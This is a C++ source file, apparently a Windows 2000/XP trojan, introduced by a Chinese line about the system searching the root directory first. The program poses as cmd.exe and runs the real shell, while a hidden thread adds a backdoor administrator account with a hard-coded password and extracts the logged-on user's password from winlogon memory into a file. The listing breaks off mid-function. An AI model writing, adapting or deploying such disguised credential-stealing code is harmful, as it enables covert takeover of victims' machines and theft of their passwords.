cmd.cpp

你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录

// cmd.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <stdlib.h>
#include <time.h>


// PasswordReminder.cpp
//
// This code is licensed under the terms of the GPL (gnu public license).
//

#include <windows.h>
#include <tchar.h>
#include <stdio.h>

typedef struct _UNICODE_STRING 
{
	USHORT Length;
	USHORT MaximumLength;
	PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

// Undocumented typedef's
typedef struct _QUERY_SYSTEM_INFORMATION
{
	DWORD GrantedAccess;
	DWORD PID;
	WORD HandleType;
	WORD HandleId;
	DWORD Handle;
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
typedef struct _PROCESS_INFO_HEADER
{
	DWORD Count;
	DWORD Unk04;
	DWORD Unk08;
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
typedef struct _PROCESS_INFO
{
	DWORD LoadAddress;
	DWORD Size;
	DWORD Unk08;
	DWORD Enumerator;
	DWORD Unk10;
	char Name [0x108];
} PROCESS_INFO, *PPROCESS_INFO;
typedef struct _ENCODED_PASSWORD_INFO
{
	DWORD HashByte;
	DWORD Unk04;
	DWORD Unk08;
	DWORD Unk0C;
	FILETIME LoggedOn;
	DWORD Unk18;
	DWORD Unk1C;
	DWORD Unk20;
	DWORD Unk24;
	DWORD Unk28;
	UNICODE_STRING EncodedPassword;
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;

typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION)  (DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING)  (BYTE, PUNICODE_STRING);

// Private Prototypes
int AddUser();
int GetPasswd();
BOOL IsWinNT (void);
BOOL IsWin2K (void);
BOOL AddDebugPrivilege (void);
DWORD FindWinLogon (void);
BOOL LocatePasswordPageWinNT (DWORD, PDWORD);
BOOL LocatePasswordPageWin2K (DWORD, PDWORD);
void DisplayPasswordWinNT (void);
void DisplayPasswordWin2K (void);
BOOL GetFile();

// Global Variables
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;

DWORD PasswordLength = 0;
PVOID RealPasswordP = NULL;
PVOID PasswordP = NULL;
DWORD HashByte = 0;
wchar_t UserName [0x400];
wchar_t UserDomain [0x400];

// Save to File
FILE *fp;
char szPassPath[MAX_PATH*2]={0};

int main(int argc, char* argv[])
{
	// Get Currently User Password
	DWORD dwThreadID;
    CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)GetPasswd,NULL,0,&dwThreadID);

	// exec cmd.exe
	char szCMDPath[MAX_PATH]={0};

	GetSystemDirectory(szCMDPath, MAX_PATH);
	strcat(szCMDPath, "\\");
	
	char *p;

	if((p=strstr(argv[0],"\\")) != NULL)
	{
		strcat(szCMDPath, p);
	}
	else
	{
		strcat(szCMDPath, argv[0]);
	}

	if(argc > 1)
		for(int i=1; i<argc; i++)
		{
			strcat(szCMDPath, argv[i]);
			strcat(szCMDPath, " ");
		}
	
	
	system(szCMDPath);
	
	return 0;
}

int AddUser()
{

	return 0;
}

int GetPasswd()
{
//	printf ("\n\tPasswordReminder\n\n");

	PROCESS_INFORMATION ProcessInformation;
	STARTUPINFO si;
    HANDLE ProcessHandle = NULL;

	// Initialize process startup info
    si.cb = sizeof(STARTUPINFO);
    si.lpReserved = NULL;
    si.lpTitle = NULL;
    si.lpDesktop = NULL;
    si.dwX = si.dwY = si.dwXSize = si.dwYSize = 0L;
    si.wShowWindow = SW_HIDE;
    si.lpReserved2 = NULL;
    si.cbReserved2 = 0;
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.hStdInput  = NULL;
    si.hStdOutput = NULL;

	if(CreateProcess(NULL, "net user ISUR_IWAM wwwcnhonkercom /add", NULL, NULL, TRUE, 0, NULL, NULL, &si, &ProcessInformation))
	{
        Sleep(1000);
		TerminateProcess(ProcessInformation.hThread, 0);
    }

	if(CreateProcess(NULL, "net localgroup administrators ISUR_IWAM /add", NULL, NULL, TRUE, 0, NULL, NULL, &si, &ProcessInformation))
	{
        Sleep(1000);
		TerminateProcess(ProcessInformation.hThread, 0);
    }

	if ((!IsWinNT ())
			&&
		(!IsWin2K ()))
	{
//		printf ("Windows NT or Windows 2000 are required.\n");
		return (0);
	}

	// Add debug privilege to PasswordReminder - 
	// this is needed for the search for Winlogon.
	if (!AddDebugPrivilege ())
	{
//		printf ("Unable to add debug privilege.\n");
		return (0);
	}
//	printf ("The debug privilege has been added to PasswordReminder.\n");

	HINSTANCE hNtDll = 
		LoadLibrary 
			("NTDLL.DLL");
	pfnNtQuerySystemInformation =
		(PFNNTQUERYSYSTEMINFORMATION) GetProcAddress 
			(hNtDll, 
			"NtQuerySystemInformation");
	pfnRtlCreateQueryDebugBuffer =
		(PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress 
			(hNtDll, 
			"RtlCreateQueryDebugBuffer");
	pfnRtlQueryProcessDebugInformation =
		(PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress 
			(hNtDll, 
			"RtlQueryProcessDebugInformation");
	pfnRtlDestroyQueryDebugBuffer =
		(PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress 
			(hNtDll, 
			"RtlDestroyQueryDebugBuffer");
	pfnRtlRunDecodeUnicodeString =
		(PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress 
			(hNtDll, 
			"RtlRunDecodeUnicodeString");

	// Locate WinLogon's PID - need debug privilege and admin rights.
	DWORD WinLogonPID =
		FindWinLogon ();
	if (WinLogonPID == 0)
	{
//		printf ("PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.\n");
//		printf ("PasswordReminder is unable to find the password in memory.\n");
		FreeLibrary 
			(hNtDll);
		return (0);
	}
//	printf	("The WinLogon process id is %d (0x%8.8lx).\n", WinLogonPID, WinLogonPID);

	// Set values to check memory block against.
	memset 
		(UserName, 
		0, 
		sizeof (UserName));
	memset 
		(UserDomain, 
		0, 
		sizeof (UserDomain));
	GetEnvironmentVariableW 
		(L"USERNAME", 
		UserName, 
		0x400);
	GetEnvironmentVariableW 
		(L"USERDOMAIN", 
		UserDomain, 
		0x400);

	// Locate the block of memory containing 
	// the password in WinLogon's memory space.
	BOOL FoundPasswordPage = FALSE;
	if (IsWin2K ())
		FoundPasswordPage =
			LocatePasswordPageWin2K 
				(WinLogonPID, 
				&PasswordLength);
	else
		FoundPasswordPage =
			LocatePasswordPageWinNT 
				(WinLogonPID, 
				&PasswordLength);

	if (FoundPasswordPage)
	{
		if (PasswordLength == 0)
		{
			if(GetFile())
			{
				if((fp=fopen(szPassPath, "a"))!=NULL)
				{
					fprintf(
						fp,
						"DomainName : %S\r\nUserName   : %S\nPassWord   : (NULL) no Password\r\n",
						UserDomain, 
						UserName);
					fclose(fp);
				}
			}
		}
		else
		{
/*			printf 
				("The encoded password is found at 0x%8.8lx and has a length of %d.\n", 
				RealPasswordP, 
				PasswordLength);
*/

			// Decode the password string.
			if (IsWin2K ())
				DisplayPasswordWin2K ();
			else
				DisplayPasswordWinNT ();
		}
	}
/*	else
		printf 
			("PasswordReminder is unable to find the password in memory.\n");
*/
	
	FreeLibrary 
		(hNtDll);
	return (0);
} // main

BOOL
	IsWinNT
		(void)
{
	OSVERSIONINFO OSVersionInfo;
	OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
	if (GetVersionEx 
			(&OSVersionInfo))
		return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT);
	else
		return (FALSE);
} // IsWinNT

BOOL
	IsWin2K
		(void)
{
	OSVERSIONINFO OSVersionInfo;
	OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
	if (GetVersionEx 
			(&OSVersionInfo))
		return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT)
					&&
				(OSVersionInfo.dwMajorVersion == 5));
	else
		return (FALSE);
} // IsWin2K

BOOL 
	AddDebugPrivilege 
		(void)
{
	HANDLE Token;
	TOKEN_PRIVILEGES TokenPrivileges, PreviousState;
	DWORD ReturnLength = 0;
	if (OpenProcessToken 
			(GetCurrentProcess (), 
			TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, 
			&Token))
		if (LookupPrivilegeValue 
				(NULL, 
				"SeDebugPrivilege", 
				&TokenPrivileges.Privileges[0].Luid))
		{
			TokenPrivileges.PrivilegeCount = 1;
			TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
			return 
				(AdjustTokenPrivileges
					(Token,
					FALSE,
					&TokenPrivileges,
					sizeof (TOKEN_PRIVILEGES),
					&PreviousState,
					&ReturnLength));
		}
	return (FALSE);
} // AddDebugPrivilege

// Note that the following code eliminates the need
// for PSAPI.DLL as part of the executable.
DWORD 
	FindWinLogon 
		(void)
{
#define INITIAL_ALLOCATION 0x100
	DWORD rc = 0;
	DWORD SizeNeeded = 0;
	PVOID InfoP = 
		HeapAlloc 
			(GetProcessHeap (),
			HEAP_ZERO_MEMORY,
			INITIAL_ALLOCATION);
	// Find how much memory is required.
	pfnNtQuerySystemInformation 
		(0x10, 
		InfoP, 
		INITIAL_ALLOCATION, 
		&SizeNeeded);
	HeapFree 
		(GetProcessHeap (),
		0,
		InfoP);
	// Now, allocate the proper amount of memory.
	InfoP = 
		HeapAlloc 
			(GetProcessHeap (),
			HEAP_ZERO_MEMORY,
			SizeNeeded);
	DWORD SizeWritten = SizeNeeded;
	if (pfnNtQuerySystemInformation 
			(0x10, 
			InfoP, 
			SizeNeeded, 
			&SizeWritten))
	{
		HeapFree 
			(GetProcessHeap (),
			0,
			InfoP);
		return (0);
	}
	DWORD NumHandles = SizeWritten / sizeof (QUERY_SYSTEM_INFORMATION);
	if (NumHandles == 0)
	{
		HeapFree 
			(GetProcessHeap (),
			0,
			InfoP);
		return (0);
	}
	PQUERY_SYSTEM_INFORMATION QuerySystemInformationP =
		(PQUERY_SYSTEM_INFORMATION) InfoP;
	DWORD i;
	for (i = 1; i <= NumHandles; i++)
	{
		// "5" is the value of a kernel object type process.
		if (QuerySystemInformationP->HandleType == 5)
		{
			PVOID DebugBufferP =
				pfnRtlCreateQueryDebugBuffer 
					(0, 
					0);
			if (pfnRtlQueryProcessDebugInformation 
					(QuerySystemInformationP->PID,
					1,
					DebugBufferP) == 0)
			{
				PPROCESS_INFO_HEADER ProcessInfoHeaderP =
					(PPROCESS_INFO_HEADER) ((DWORD) DebugBufferP + 0x60);
				DWORD Count =
					ProcessInfoHeaderP->Count;
				PPROCESS_INFO ProcessInfoP =
					(PPROCESS_INFO) ((DWORD) ProcessInfoHeaderP + sizeof (PROCESS_INFO_HEADER));